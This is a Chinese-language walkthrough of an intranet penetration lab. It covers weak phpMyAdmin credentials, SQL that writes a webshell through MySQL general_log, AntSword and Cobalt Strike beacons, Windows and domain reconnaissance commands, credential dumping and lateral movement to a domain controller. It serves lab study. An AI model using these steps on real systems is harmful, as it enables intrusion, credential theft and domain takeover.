网络配置
其中win7作为web服务器来使用,与其他两个电脑都在内网中,并且可以互相访问。
win7
含有两个网卡,其中一个为VM13为内网,另一个为NAT连接外网
win 2008
win 2K3
IP分配
win7
外网
内网
win 2008
win 2K3
kali
主机 | IP |
win7 | 192.168.109.134 |
win7 | 192.168.52.143 |
win 2008 | 192.168.52.138 |
win 2K3 | 192.168.52.141 |
kali | 192.168.109.132 |
主机 | 192.168.109.1 |
可以看到kali与win7处于在同一个物理网络下
互通情况
使用主机分别去ping三个内网的机器
互通情况如下:
win7与内网主机ping
结果如下:
可以看到内网之间的主机互通,而外网访问不了内网。
服务开启
开启win7中的phpstudy
在浏览器中打开
在主机浏览器上访问192.168.109.194
探测目标
Kali自带了arp扫描器,可以通过这个工具扫描出和自身网卡同一网段的主机
arp-scan -l #扫描网段所有主机
arp-scan -I eth0 -l #扫描指定网段所有ip
使用root权限进行扫描,很快就可以发现在同一个网段下的主机。
扫描目录
使用御剑来扫描目录,可以看到该信息
进入phpMyAdmin
点击上方网址进入内部
使用弱口令root/root进入
这里使用phpmyadmin日志写shell,先查看有没有开启日志
写入的条件如下:
- root权限
- 知道绝对路径
- secure_file_priv没有具体值
show global variables like "%secure%"; 来查看日志有没有开启
可以看到没有开启,并且secure_file_priv没有具体值
接下来开启日志并且写入绝对路径
set global general_log="on";
#开启日志,修改为on
set global general_log_file="C:/phpStudy/WWW/1.php";
#修改日志路径(在上面提到的phpinfo.php中有泄露路径)
写入一句话木马
SELECT ''
使用蚁剑连接
添加成功,然后就可以对其进行操作
可以操作的命令如下:
whoami # 查看当前用户名
whoami /all # 获取域SID
ipconfig /all # 网络配置文件
route print # 打印路由信息
arp -a # 查看arp缓存,可以发现内网主机
systeminfo # 操作系统信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 操作系统、软件版本信息
systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本" # 操作系统、软件版本信息(中文)
echo %PROCESSOR_ARCHITECTURE% # 系统体系架构
wmic product get name,version # 系统安装的软件及版本信息
wmic service list brief # 本机服务信息
tasklist /v # 本机进程
net statistics workstation # 主机开机时间
schtasks /query /fo LIST /v # 计划任务
net user # 查看本地用户
net localgroup administrators # 查看本地管理员组(通常包含域用户)
net user xxx # 查看指定用户详细信息
使用CS创建监听器上传并连接木马
已经使用蚁剑连接了主机
接下来创建CS监听,然后创建一个木马文件
使用蚁剑上传并且打开
步骤如下:
可以看见创建成功
将他保存到桌面
使用蚁剑上传
点击上传文件,选择刚刚做好的木马
可以看到上传成功
这个时候使用蚁剑,在终端运行shell.exe
可以看到在监听器上方上线了主机
右键改一下sleep时间间隔
信息收集
右键进入Beacon
shell hostname 查询主机名字
shell net users 查看用户列表
shell net config Workstation 查看域
shell net localgroup administrators 查看域管
shell net group “domain admins” /domain 查看域控
查看所有域成员计算机列表
查找域管
net view 查看当前域列表
查完以后点击即可看到当前域内主机
提权
先抓取服务器凭证
点击转储Hash
然后抓取明文密码
使用插件(需要插件可以私聊我)
这时候可以看见一个SYSTEM*,这个及root权限
横向移动
创建smb监听
横向移动,使用刚刚拿到的凭证去创这个域控
拿下域控,然后拿域控去创剩下的那个主机